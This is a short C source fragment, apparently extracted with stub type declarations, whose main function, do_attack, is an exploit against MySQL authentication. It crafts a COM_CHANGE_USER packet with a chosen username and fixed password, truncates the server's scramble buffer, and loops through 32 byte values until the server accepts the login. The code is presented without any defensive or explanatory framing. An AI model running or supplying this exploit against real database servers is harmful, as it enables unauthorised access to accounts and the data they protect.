
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_1__ ;


typedef int uint ;
typedef int my_bool ;
struct TYPE_4__ {int protocol_version; scalar_t__* scramble_buff; } ;
typedef TYPE_1__ MYSQL ;


 int COM_CHANGE_USER ;
 char* scramble (char*,scalar_t__*,char*,int ) ;
 int simple_command (TYPE_1__*,int ,char*,int ,int ) ;
 scalar_t__ strmov (char*,char*) ;

int do_attack(MYSQL *mysql, char *attackuser) {
   char buff[512], *pos=buff, *attackpasswd = "A";
   int i, len, j, ret = 1;

   pos = (char*)strmov(pos,attackuser)+1;
   mysql->scramble_buff[1] = 0;
   pos = scramble(pos, mysql->scramble_buff, attackpasswd,
               (my_bool) (mysql->protocol_version == 9));
   pos = (char*)strmov(pos+1,"");
   len = pos-buff;

   for (j = 0; ret && j < 32; j++) {
       buff[5] = 65 + j;
       ret = simple_command(mysql,COM_CHANGE_USER, buff,(uint)len,0);
   }

   return ret;
}
